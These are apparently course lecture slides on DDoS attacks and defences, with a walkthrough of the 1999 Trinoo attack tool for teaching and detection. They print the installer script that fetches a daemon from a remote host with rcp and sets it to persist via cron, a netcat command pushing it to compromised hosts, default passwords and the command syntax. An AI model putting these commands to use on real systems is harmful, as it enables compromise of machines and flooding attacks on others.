DDoS Protection Protecting Against The DDoS Attacks Since 2007
1.1 Operating System Concepts An Introduction to DDoS And the “Trinoo” Attack Tool...
-
Upload
bennett-merritt -
Category
Documents
-
view
215 -
download
0
Transcript of 1.1 Operating System Concepts An Introduction to DDoS And the “Trinoo” Attack Tool...
1.1Operating System Concepts
An Introduction to DDoS
And the “Trinoo” Attack Tool
Acknowledgement: Ray Lam, Ivan Wong
1.2Operating System Concepts
Outline
Background on DDoS Attack mechanism Ways to defend
The attack tool – Trinoo Introduction Attack scenario Symptoms and defense Weaknesses and next evolution
1.4Operating System Concepts
Denial-Of-Service
Flooding-based Send packets to victims
Network resources System resources
Traditional DOS One attacker
Distributed DOS Countless attackers
1.5Operating System Concepts
Attack Mechanism
Direct Attack
Reflector Attack
R
A
V
TCP SYN, ICMP, UDP With R’s Address as source IP address.
TCP SYN-ACK, TCP RST, ICMP, UDP..
TCP SYN-ACK, TCP RST, ICMP, UDP..
R
V
ATCP SYN, ICMP, UDP.. With V’s Address as source IP address.
1.6Operating System Concepts
Attack Architecture
V
A
Masters (handlers)
Agents (Daemons or Zombies)
TCP SYN, ICMP, UDP.. (the source IP addresses are usually spoofed)
Direct Attack
A
Masters (handlers)
Agents (Daemons or Zombies)
Reflectors
VReflector Attack
TCP SYN, ICMP, UDP.. (with V’s address as the source IP addresses)
TCP SYN-ACK, TCP RST, ICMP, UDP..
1.7Operating System Concepts
Attack Methods
Attack packets Reply packets
Smurf ICMP echo queries to broadcast address ICMP echo replies
SYN flooding TCP SYN packets TCP SYN ACK packets
RST flooding TCP packets to closed ports TCP RST packets
ICMP flooding ICMP queriesUDP packets to closed portsIP packets with low TTL
ICMP repliesPort unreachableTime exceeded
DNS reply flooding DNS queries (recursive) to DNS servers DNS replies
1.8Operating System Concepts
BackScatter Analysis (Moore et al.)
Measured DOS activity on the Internet.
TCP (94+ %) UDP (2 %) ICMP (2 %)
TCP attacks based mainly on SYN flooding
1.10Operating System Concepts
Strategy
Three lines of defense: Attack prevention
- before the attack Attack detection and filtering
- during the attack Attack source traceback
- during and after the attack
1.11Operating System Concepts
Attack prevention
Protect hosts from installation of masters and agents by attackers
Scan hosts for symptoms of agents being installed
Monitor network traffic for known message exchanges among attackers, masters, agents
1.12Operating System Concepts
Attack prevention
Inadequate and hard to deploy Don’t-care users leave security holes ISP and enterprise networks do not
have incentives
1.13Operating System Concepts
Attack source traceback
Identify actual origin of packet Without relying on source IP of
packet 2 approaches
Routers record info of packets Routers send additional info of packets to
destination
1.14Operating System Concepts
Attack source traceback
Source traceback cannot stop ongoing DDoS attack Cannot trace origins behind
firewalls, NAT (network address translators)
More to do for reflector attack (attack packets from legitimate sources)
Useful in post-attack law enforcement
1.15Operating System Concepts
Attack detection and filtering
Detection Identify DDoS attack and attack
packets Filtering
Classify normal and attack packets Drop attack packets
1.16Operating System Concepts
Attack detection and filtering
Can be done in 4 places Victim’s network Victim’s ISP network Further upstream ISP network Attack source networks
Dispersed agents send packets to single victim
Like pouring packets from top of funnel
1.17Operating System Concepts
Attack detection and filtering
Victim
Attack sourcenetworks
Further upstreamISP networks
Victim’s ISP network
Victim’s network
Effectiveness of filtering
increases
Effectiveness of detection
increases
1.18Operating System Concepts
Attack detection and filtering
Detection Easy at victim’s network – large amount
of attack packets Difficult at individual agent’s network –
small amount of attack packets Filtering
Effective at agents’ networks – less likely to drop normal packets
Ineffective at victim’s network – more normal packets are dropped
1.19Operating System Concepts
D&F at agent’s network
Usually cannot detect DDoS attack
Can filter attack packets with address spoofed Attack packets in direct attacks Attack packets from agents to
reflectors in reflector attacks Ensuring all ISPs to install
ingress packet filtering is impossible
1.20Operating System Concepts
D&F at victim’s network
Detect DDoS attack Unusually high volume of incoming traffic
of certain packet types Degraded server and network
performance Filtering is ineffective
Attack and normal packets have same destination – victim’s IP and port
Attack packets have source IP spoofed or come from many different IPs
Attack and normal packets indistinguishable
1.21Operating System Concepts
D&F at victim’s upstream ISP
Often requested by victim to filter attack packets
Alert protocol Victim cannot receive ACK from ISP Requires strong authentication and
encryption Filtering ineffective ISP network may also be jammed
1.22Operating System Concepts
D&F at further upstream ISP
Backpressure approach Victim detects DDoS attack Upstream ISPs filter attack
packets
1.24Operating System Concepts
Introduction
Discovered in August 1999 Daemons found on Solaris 2.x
systems Attack a system in University of
Minnesota Victim unusable for 2 days
1.25Operating System Concepts
Attack type
UDP flooding Default size of UDP packet: 1000
bytes malloc() buffer of this size and send
uninitialized content Default period of attack: 120 seconds Destination port: randomly chosen
from 0 – 65534
1.27Operating System Concepts
Installation
1. Hack an account Acts as repository
Scanning tools, attack tools, Trinoo daemons, Trinoo maters, etc.
Requirements High bandwidth connection Large number of users Little administrative oversight
1.28Operating System Concepts
Installation
2. Compromise systems Look for vulnerable systems
Unpatched Sun Solaris and Linux
Remote buffer overflow exploitation Set up root account Open TCP ports
Keep a `friend list`
1.29Operating System Concepts
Installation
3. Install daemons Use “netcat” (“nc”) and “trin.sh”
netcat Network version of “cat”
trin.sh Shell script to set up daemons
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
1.30Operating System Concepts
Installation
trin.sh
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"echo "crontab cron"echo "echo launched"echo "exit"
1.31Operating System Concepts
Architecture
Victim
Attacker
Masters (handlers)
Agents (Daemons or Zombies)
Direct Attack
1.32Operating System Concepts
Communication ports
Monitor specific ports to detect presence of master, agent
Attacker Master Daemon
Port 27665
TCPUDP
UDP Port 27444
Port 31335
1.33Operating System Concepts
Password protection
Password used to prevent administrators or other hackers to take control
Encrypted password compiled into master and daemon using crypt()
Clear-text password is sent over network – session is not encrypted
Received password is encrypted and compared
1.34Operating System Concepts
Password protection
Default passwords “l44adsl” – trinoo daemon
password “gOrave” – trinoo master server
startup “betaalmostdone” – trinoo master
remote interface password “killme” – trinoo master password
to control “mdie” command
1.35Operating System Concepts
Login to master
Telnet to port 27665 of the host with master Enter password “betaalmostdone” Warn if others try to connect the master
[root@r2 root]# telnet r1 27665Trying 192.168.249.201...Connected to r1.router (192.168.249.201).Escape character is '^]'.betaalmostdonetrinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
trinoo>
1.36Operating System Concepts
Master and daemon
Communicate by UDP packets Command line format
arg1 password arg2
Default password is “l44adsl” When daemon starts, it sends
“HELLO” to master Master maintains list of daemon
1.37Operating System Concepts
Master commands
dos IP DoS the IP address specified “aaa l44adsl IP” sent to each
daemon mdos <ip1:ip2:ip3>
DoS the IPs simultaneously mtimer N
Set attack period to N seconds
1.38Operating System Concepts
Master commands
bcast List all daemons’ IP
mdie password Shutdown all daemons
killdead Invite all daemons to send
“HELLO” to master Delete all dead daemons from the
list
1.39Operating System Concepts
Daemon commands
Not directly used; only used by master to send commands to daemons
Consist of 3 letters Avoid exposing the commands by
using Unix command “strings” on the binary
1.40Operating System Concepts
Daemon commands
aaa password IP DoS specified IP
bbb password N Set attack period to N seconds
rsz password N Set attack packet size to N bytes
1.42Operating System Concepts
Symptoms
Masters Crontab
Friend list … …-b
* * * * * /usr/sbin/rpc.listen
# ls -l ... ...-b -rw------- 1 root root 25 Sep 26 14:46 ... -rw------- 1 root root 50 Sep 26 14:30 ...-b
1.43Operating System Concepts
Symptoms
Masters (Con’t) Socket status
# netstat -a --inetActive Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:27665 *:* LISTEN . . .udp 0 0 *:31335 *:* . . .
1.44Operating System Concepts
Symptoms
Masters (Con’t) File status
# lsof | egrep ":31335|:27665"master 1292 root 3u inet 2460 UDP *:31335 master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)
# lsof -p 1292COMMAND PID USER FD TYPE DEVICE SIZE NODE NAMEmaster 1292 root cwd DIR 3,1 1024 14356 /tmp/...master 1292 root rtd DIR 3,1 1024 2 /master 1292 root txt REG 3,1 30492 14357 /tmp/.../mastermaster 1292 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.somaster 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so
1.45Operating System Concepts
Symptoms
Daemons Socket status
# netstat -a --inetActive Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address State . . .udp 0 0 *:1024 *:* udp 0 0 *:27444 *:* . . .
1.46Operating System Concepts
Symptoms
Daemons (Con’t) File status
# lsof | egrep ":27444"ns 1316 root 3u inet 2502 UDP *:27444
# lsof -p 1316COMMAND PID USER FD TYPE DEVICE SIZE NODE NAMEns 1316 root cwd DIR 3,1 1024 153694 /tmp/...ns 1316 root rtd DIR 3,1 1024 2 /ns 1316 root txt REG 3,1 6156 153711 /tmp/.../nsns 1316 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.sons 1316 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.sons 1316 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so
1.47Operating System Concepts
Defenses
Prevent root level compromise Patch systems Set up firewalls Monitor traffics
Block abused ports High numbered UDP ports Trade off
Also block normal programs using the same ports
1.49Operating System Concepts
Weaknesses
Single kind of attack UDP flooding Easily defended by single defense
tools Use IP as destination address
“Moving target defense” – victim changes IP to avoid attack
1.50Operating System Concepts
Weaknesses
Password, encrypted password, commands visible in binary images Use Unix command “strings” to obtain
- strings master- strings –n3 ns
Check if Trinoo found Crack the encrypted passwords
1.51Operating System Concepts
Weaknesses
Password travels in plain text in network Daemon password frequently sent in
master-to-daemon commands Get password by “ngrep”, “tcpdump”
which show UDP payload
1.52Operating System Concepts
Uproot a Trinoo network
Locate a daemon Use “strings” to obtain IPs of masters Contact sites with master installed Those sites check list of daemons
By inspecting file “…” or get master login password and use “bcast” command
Get “mdie” password Use “mdie” to shut down all daemons “mdie” periodically as daemons restarted by
crontab
1.53Operating System Concepts
Next evolution
Combination of several attack types SYN flood, UDP flood, ICMP flood… Higher chance of successful attack
Stronger encryption of embedded strings, passwords
Use encrypted communication channel
Communicate by protocol difficult to be detected or blocked, e.g. ICMP
1.54Operating System Concepts
References
R. Chang, “Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial,” Oct. 2002
D. Dittrich, “The DoS Project’s ‘Trinoo’ Distributed Denial of Service Attack Tool,” http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt, Oct. 1999